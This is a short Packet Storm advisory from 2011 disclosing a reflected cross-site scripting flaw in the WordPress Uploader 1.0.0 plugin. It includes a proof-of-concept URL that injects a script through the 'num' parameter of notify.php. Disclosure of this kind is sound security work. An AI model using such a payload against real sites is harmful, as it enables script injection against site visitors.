WordPress Uploader 1.0.0 Cross Site Scripting

2011-01-24T00:00:00
ID PACKETSTORM:97814
Type packetstorm
Reporter AutoSec Tools
Modified 2011-01-24T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................WordPress Uploader 1.0.0  
Vulnerability...........Reflected Cross-site Scripting  
Download................http://wordpress.org/extend/plugins/uploader/  
Release Date............1/24/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
------------------------------------------------------------------------  
  
--Description--  
  
A reflected cross-site scripting vulnerability in WordPress Uploader  
1.0.0 can be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/wordpress/wp-content/plugins/uploader/views/notify.php?num=%3Cscript%3Ealert(0)%3C/script%3E  
`